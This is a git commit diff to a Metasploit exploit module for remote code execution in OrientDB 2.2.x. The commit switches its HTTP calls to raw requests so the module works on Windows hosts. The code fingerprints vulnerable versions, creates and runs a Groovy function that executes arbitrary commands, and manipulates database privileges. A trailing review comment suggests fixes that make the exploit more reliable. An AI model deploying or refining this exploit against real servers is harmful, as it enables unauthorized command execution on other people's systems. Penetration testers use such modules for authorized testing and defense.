Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting Windows boxes

bug/bundler_fix
Ricardo Almeida 2017-07-26 13:59:14 +01:00
parent fe5c6dc28f
commit 30664924c8
No known key found for this signature in database
GPG Key ID: E44BDAD000B9B1E0
1 changed files with 8 additions and 13 deletions


@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
def check
uri = target_uri
uri.path = normalize_uri(uri.path)
res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
print_good("Version: #{res.headers['Server']}")
return Exploit::CheckCode::Vulnerable
@ -67,12 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
if not (res and res.code == 201)
begin
json_body = JSON.parse(res.body)
@ -85,12 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
'data' => ""
}
req = send_request_cgi(request_parameters)
req = send_request_raw(request_parameters)
if not (req and req.code == 200)
begin
json_body = JSON.parse(res.body)
@ -113,12 +111,11 @@ class MetasploitModule < Msf::Exploit::Remote
request_parameters = {
'method' => 'DELETE',
'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => ""
}
rer = send_request_cgi(request_parameters)
rer = send_request_raw(request_parameters)
if not (rer and rer.code == 204)
begin
json_body = JSON.parse(res.body)
@ -159,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Attempting to execute: #{cmd}")
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
@ -199,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
@uri = target_uri
@uri.path = normalize_uri(@uri.path)
res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
if res && res.code == 200 && res.body.length > 0
begin
json_body = JSON.parse(res.body)["databases"]
@ -221,12 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "GRANT #{priv} ON #{item} TO writer"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
end
end
# Exploit
@ -249,12 +245,11 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
'vars_get' => { 'format' => 'rid,type,version,class,graph' },
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'Accept' => '*/*' },
'data' => "REVOKE #{priv} ON #{item} FROM writer"
}
res = send_request_cgi(request_parameters)
res = send_request_raw(request_parameters)
end
end
end
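Review bot: In the GRANT and REVOKE hunks (old lines 221 and 249) the request hash still carries `'vars_get' => { 'format' => 'rid,type,version,class,graph' }`, but `send_request_raw` does not build a query string from `vars_get` (only `send_request_cgi` does), so after this change the `format` parameter is silently dropped from both requests. If the server's response depends on it, pass it as the raw query string that the raw path does read: `'query' => 'format=rid,type,version,class,graph',` in place of the `vars_get` line in each of the two hunks. A secondary inconsistency left untouched in the failure branches of the function-create and function-delete hunks (old lines 85 and 113): the code checks `req`/`rer` but then parses `res.body`, so the error reported comes from the earlier `listDatabases` response rather than the request that just failed; `json_body = JSON.parse(req.body)` and `json_body = JSON.parse(rer.body)` respectively would match the check above them. The enclosing methods of those hunks begin and end outside the visible lines.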